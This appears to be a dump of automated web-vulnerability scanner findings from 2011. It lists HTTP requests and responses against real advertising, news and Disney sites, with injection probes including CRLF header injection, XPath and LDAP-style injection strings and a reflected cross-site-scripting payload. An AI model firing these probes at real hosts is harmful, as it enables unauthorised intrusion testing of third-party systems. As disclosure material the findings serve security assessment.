HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:50 GMT Content-Length: 102660 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> <div id="gde_chromeData" class="gde_chromeData"> <div id="gde_chromeDataHome"> <a href="http://disney.go </div> <div id="gde_chromeDataRows"> <div id="gde_chromeDataTopRow" <ul> <li><a id="movies" href="http://disney.go <li><a id="tv" href="http://tv.disney.go <li><a id="music" href="http://disney.go <li><a id="live_events" href="http://disney.go <li><a id="books" href="http://disney.go <li><a id="parks" href="http://disneyparks <li><a id="store" href="http://www </ul> </div> <div id="gde_chromeDataBo <ul> <li><a id="characters" iconId="iconCharacters" channelId="153608" href="http://disney.go <li><a id="games" iconId="iconGames" channelId="153603" href="http://disney.go <li><a id="videos" iconId="iconVideos" channelId="153585" href="http://disney.go <li><a id="create" iconId="iconCreate" channelId="307445" href="http://disney.go <li><a id="my_page" iconId="iconMyPage" channelId="153582" href="http://disney.go </ul> </div> </div> <div id="gde_chromeDataSearch" <a href="http://disney.go </div> </div> <script language="javascript" type="text/javascript"> var _gdeChrome = ne ...[SNIP]... |
GET /*)!(sn=*/dcl_v0400/Site Host: dcl2.wdpromedia.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 404 Not Found Server: Apache-Coyote/1.1 Content-Type: text/html;charset=ISO Content-Language: en-US Vary: Accept-Encoding Date: Mon, 16 May 2011 01:29:50 GMT Content-Length: 33416 Connection: close <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <h ...[SNIP]... <div id="DOLChrome"> </div><div id="bodyContainer"> <div id="loginRegForm" class="yui-navset"> <ul class="yui-nav clearfix"> <li class="first-of-type selected"><a href="#tab1" title="Log In"><em>Log In</em></a></li> <li><a href="#tab2" title="Forgot Password"><em>Forgot Password</em></a></li> </ul> <div class="yui-content"> <div id="loginForm" class="flyoutForm"> <form method="post" action="/login/" id="loginFlyoutForm"> <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="userName" class="formInput" value="" /></dd> <dt><label for="loginPassword" <dd class="loginFormInput required"><input type="password" id="loginPassword" name="gspw" class="formInput <dd class="loginFormSubmit"> <dd class="extraLinks"><a href="/forgot-password/" title="Forgot your password?">Forgot your password?</a></dd> <dd class="extraLinks"><a href="/register/" title="Don't have a log in? Register Now">Don't have a log in? Register Now</a></dd> </dl> </form> </div> <div id="forgotPassForm" class="flyoutForm"> <form method="post" action="/forgot-password/ <dl> <dt><label for="loginEmailAddress" <dd class="loginFormInput required"><input type="text" id="loginEmailAddress" name="memberName" class="formInput" value="" /></dd> <dt><label for="flyoutLastName">Last Name:</label></dt> <dd class="loginFormInput required"><input type="text" id="flyoutLastName" name="lastName" class="formInput" value="" /></dd> <dt><label for="birthDay">Your Birthday:</label></dt> <dd class="required birthday"> <select name ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://travel.usatoday |
Path: | /cruises/post/2011/05 |
GET /cruises/post'/2011/05/disney-cruise Host: travel.usatoday.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Mon, 16 May 2011 01:20:15 GMT Content-Length: 3080 <b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString( ...[SNIP]... <br/> at System.Xml.XPath.XPathExpression.Compile ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /adj/tmg.telegraph |
GET /678b5%0d%0a8384566a10f/tmg.telegraph.sponsored Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/678b5 8384566a10f/tmg.telegraph.sponsored Date: Mon, 16 May 2011 01:35:08 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad-emea.doubl |
Path: | /adj/tmg.telegraph |
GET /6df0f%0d%0a9d7229a8f0d/tmg.telegraph.sponsored Host: ad-emea.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/6df0f 9d7229a8f0d/tmg.telegraph.sponsored Date: Mon, 16 May 2011 01:21:41 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /237ec%0d%0a880ab23038f/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/237ec 880ab23038f/N3941.InviteMedia Date: Mon, 16 May 2011 01:34:04 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N4975.1207 |
GET /8fa4b%0d%0a608cfb9867d/N4975.1207.TRAVELOCITY Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://dm.travelocity.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/8fa4b 608cfb9867d/N4975.1207.TRAVELOCITY Date: Mon, 16 May 2011 01:30:30 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N5823.DbclkAdEx |
GET /2e63e%0d%0a47716407f97/N5823.DbclkAdEx/B5478635 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://googleads.g User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/2e63e 47716407f97/N5823.DbclkAdEx/B5478635 Date: Mon, 16 May 2011 01:42:11 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/x1.dt/dt |
GET /84877%0d%0ac4dfd0f2329/x1.dt/dt;sz=1x1;ord Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.doubleclick.net User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/84877 c4dfd0f2329/x1.dt/dt;sz=1x1;ord Date: Mon, 16 May 2011 01:25:42 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/N5155.272756.AOL |
GET /13a44%0d%0ad08cd4fa359/N5155.272756.AOL Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://travel.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/13a44 d08cd4fa359/N5155.272756.AOL Date: Mon, 16 May 2011 01:26:55 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adj/pmv.telegraph.tg |
GET /858b0%0d%0a7d93e849469/pmv.telegraph.tg Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 302 Moved Temporarily Content-Type: text/html Content-Length: 36 Location: http://static.2mdn.net/858b0 7d93e849469/pmv.telegraph.tg Date: Mon, 16 May 2011 01:21:36 GMT Server: GFE/2.0 <h1>Error 302 Moved Temporarily</h1> |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=745cd%0d%0aa239816aaf&d=.zedo.com HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.observertoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZEDOIDA=lYrOTcGt89Yz |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: 745cd a239816aaf;expires=Wed, 15 Jun 2011 05: 00:00 GMT;domain=.zedo.com;path ETag: "637af42d-1f5-47f291 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=6911 Date: Mon, 16 May 2011 01:30:24 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8441 Date: Mon, 16 May 2011 01:28:23 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... lMC04YTVhLTc3NDdlNGU ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8441 Date: Mon, 16 May 2011 01:29:21 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... 3NDdlNGUwYmMzYwCXoQEAAAA= ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8381 Date: Mon, 16 May 2011 01:32:01 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... optimized-by.rubicon var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8381 Date: Mon, 16 May 2011 01:31:10 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... ttp%3A%2F%2Foptimized-by ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8377 Date: Mon, 16 May 2011 01:30:15 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... oQEAAAA=,,http%3A%2F ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.doubleclick.net |
Path: | /adi/N3941.InviteMedia |
GET /adi/N3941.InviteMedia Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://ad.yieldmanager User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: id=ca42d81370000b3||t |
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 8381 Date: Mon, 16 May 2011 01:32:52 GMT Cache-Control: private, x-gzip-ok="" <html><head><title ...[SNIP]... rack_click?auctionID var fscUrl = url; var fscUrlClickTagFound = false; var wmode = "opaque"; var bg = ""; var ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=53909"><script>alert(1)< Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:51 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:19:50 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=1 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://ads.pubmatic.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=4325897289836481830; pf=UzQBb_qiX6nr0FKOS |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 12-Nov-2011 01:19:52 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Mon, 16 May 2011 01:19:52 GMT Content-Length: 377 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:24:15 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Content-Type: application/x-javascript Date: Mon, 16 May 2011 01:24:15 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.telegraph.co User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: anj=Kfu=8fG5+^Cxrx)0s]# |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Tue, 17-May-2011 01:25:25 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=3420415245200633085 Content-Type: application/x-javascript Date: Mon, 16 May 2011 01:25:25 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
Severity: | High |
Confidence: | Certain |
Host: | http://ads.bluelithium |
Path: | /st |
GET /st?ad_type=ad&ad_size Host: ads.bluelithium.com Proxy-Connection: keep-alive Referer: http://optimized-by User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Mon, 16 May 2011 01:23:40 GMT Server: YTS/1.18.4 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Cache-Control: no-store Last-Modified: Mon, 16 May 2011 01:23:40 GMT Pragma: no-cache Content-Length: 4323 Age: 0 Proxy-Connection: close /* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=0;var rm_pop_times=0;var rm_pop_nofreqcap=0;var rm_passback=0;var rm_tag_type="";rm_tag ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:34:31 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:34:31 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB17 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=D952C2DC-3CBA-42CB Cache-Expires: Mon, 16 May 2011 13:34:31 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 7340 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... de_chromeContainer th { text-align: left; }#gde_chromeContainer {font-size:11px;width:100 ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:35:28 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:35:28 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=3FD48562-E5BB-4B43 Cache-Expires: Mon, 16 May 2011 13:35:28 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 7496 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... :left;background-image ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:36:19 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:36:19 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB14 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=FA3E265E-A72E-45E9 Cache-Expires: Mon, 16 May 2011 13:36:19 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 7340 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... 0;}#gde_chromeContents {margin:0 auto;background-color: ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
GET /globalelements/chrome Host: ahome.disney.go.com Proxy-Connection: keep-alive Referer: http://disneycruise User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24 Accept: text/css,*/*;q=0.1 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: gi=usa|vt|stowe|broadband |
HTTP/1.1 200 OK Cache-Control: max-age=43200 Date: Mon, 16 May 2011 01:37:06 GMT Content-Type: text/css; charset=iso-8859-1 Last-Modified: Mon, 16 May 2011 01:37:06 GMT Server: Microsoft-IIS/6.0 From: DOLDISWEB10 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" Set-Cookie: SWID=B07D636C-D39C-4932 Cache-Expires: Mon, 16 May 2011 13:37:06 GMT X-UA-Compatible: IE=EmulateIE7 Content-Length: 7379 Connection: keep-alive #gde_chromeContainer ul,#gde_chromeContainer ol,#gde_chromeContainer li,#gde_chromeContainer pre,#gde_chromeContainer form,#gde_chromeContainer fieldset,#gde_chrome ...[SNIP]... t:bold;}a.gde_chrome ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ahome.disney.go |
Path: | /globalelements/chrome |
